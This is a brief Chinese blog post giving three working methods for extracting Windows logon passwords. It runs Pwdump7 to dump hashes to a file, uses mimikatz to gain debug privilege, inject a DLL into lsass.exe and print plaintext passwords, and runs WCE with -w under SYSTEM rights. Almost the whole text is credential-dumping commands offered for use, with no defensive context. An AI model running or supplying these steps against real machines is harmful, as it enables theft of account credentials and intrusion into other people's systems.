这篇文章上次修改于 1563 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

三种比较实用的方法: 1>Pwdump7

Pwdump7.exe

Pwdump7.exe >pass.txt

  2>mimikatz //运行mimikatz.exe //提升权限(可免):

privilege::debug

//注入DLL:

inject::process lsass.exe "C:sekurlsa.dll"

//抓取密码:

@getLogonPasswords

wdigest后面为明文密码。 //EXIT退出。

3>WCE(Windows Credentials Editor)1.3 一直都是用1.3,试过1.4beta,程序出错。 system权限直接爆明文:

wce.exe -w